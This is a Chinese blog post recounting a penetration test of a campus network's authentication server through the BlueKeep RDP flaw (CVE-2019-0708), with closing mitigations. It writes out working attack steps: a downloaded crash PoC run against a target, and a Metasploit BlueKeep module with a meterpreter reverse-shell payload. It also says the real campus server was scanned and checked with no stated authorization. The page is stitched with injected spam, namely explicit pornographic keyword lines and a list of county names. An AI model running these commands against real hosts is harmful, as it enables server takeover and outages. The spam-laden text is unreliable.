五月天青色头像情侣网名,国产亚洲av片在线观看18女人,黑人巨茎大战俄罗斯美女,扒下她的小内裤打屁股

歡迎光臨散文網(wǎng) 會(huì)員登陸 & 注冊(cè)

記一次校園網(wǎng)滲透測(cè)試

2023-03-03 00:01 作者:悲匠  | 我要投稿

ps:發(fā)文前已將漏洞反饋至校園信息中心,菜雞投稿,如有不對(duì)的地方還請(qǐng)各位大佬指正

設(shè)備連接校園網(wǎng)跳轉(zhuǎn)到了銳捷校園網(wǎng)認(rèn)證界面

得到校園網(wǎng)服務(wù)器地址:10.25.254.11

通過(guò)nmap工具掃描端口發(fā)現(xiàn)以下端口開放

發(fā)現(xiàn)服務(wù)器的3389端口開放,推測(cè)3389端口可能存在 cve-2019-0708漏洞

利用msf工具進(jìn)行掃描,發(fā)現(xiàn)服務(wù)器確實(shí)存在該漏洞,通過(guò)該漏洞我們可以獲取服務(wù)器控制權(quán)或?qū)Ψ?wù)器發(fā)起藍(lán)屏攻擊,使服務(wù)器癱瘓,或獲取服務(wù)器shell。

1.對(duì)服務(wù)器發(fā)動(dòng)藍(lán)屏攻擊(本次攻擊未攻擊校園網(wǎng)服務(wù)器,搭建了相同環(huán)境的靶機(jī)進(jìn)行測(cè)試)

使用漏洞利用工具:git clone https://github.com/n1xbyte/CVE-2019-0708.git

下載完后使用命令 crashpoc.py 192.168.1.108 64 //crashpoc.py 目標(biāo)ip

運(yùn)行工具后靶機(jī)藍(lán)屏

2.利用該漏洞獲取目標(biāo)shell

使用exploit/windows/rdp/cve_2019_0708_bluekeep_rce漏洞模塊

輸入命令use?exploit/windows/rdp/cve_2019_0708_bluekeep_rce


設(shè)置目標(biāo):輸入命令set rhosts 192.168.1.108

使用payload:輸入命令set payload windows/x64/meterpreter/reverse_tcp

設(shè)置主機(jī)架構(gòu):set target 2


執(zhí)行,獲取服務(wù)器shell

獲取服務(wù)器shell后就可以為所欲為了,校園網(wǎng)認(rèn)證服務(wù)器開放的其它端口也存在一些漏洞,目前已將漏洞反饋至校園信息中心,本次滲透未影響服務(wù)器正常運(yùn)行


解決方案:

1.在運(yùn)行受支持版本的 Windows 7、Windows Server 2008 和 Windows Server 2008 R2 的系統(tǒng)上啟用網(wǎng)絡(luò)級(jí)身份驗(yàn)證 (NLA)

2.在企業(yè)邊界防火墻處阻止 TCP 端口 3389


記一次校園網(wǎng)滲透測(cè)試的評(píng)論 (共 條)

分享到微博請(qǐng)遵守國(guó)家法律
丰镇市| 临泽县| 汤原县| 盱眙县| 依兰县| 襄樊市| 饶河县| 鄯善县| 青浦区| 阳原县| 汤原县| 安顺市| 益阳市| 井冈山市| 县级市| 清镇市| 上林县| 泌阳县| 高青县| 鹿邑县| 淳安县| 济宁市| 清远市| 乌兰县| 龙川县| 金坛市| 肇东市| 松江区| 尉氏县| 积石山| 新竹县| 丹江口市| 阳城县| 清镇市| 大荔县| 莒南县| 蕲春县| 河西区| 漳平市| 文化| 嘉祥县|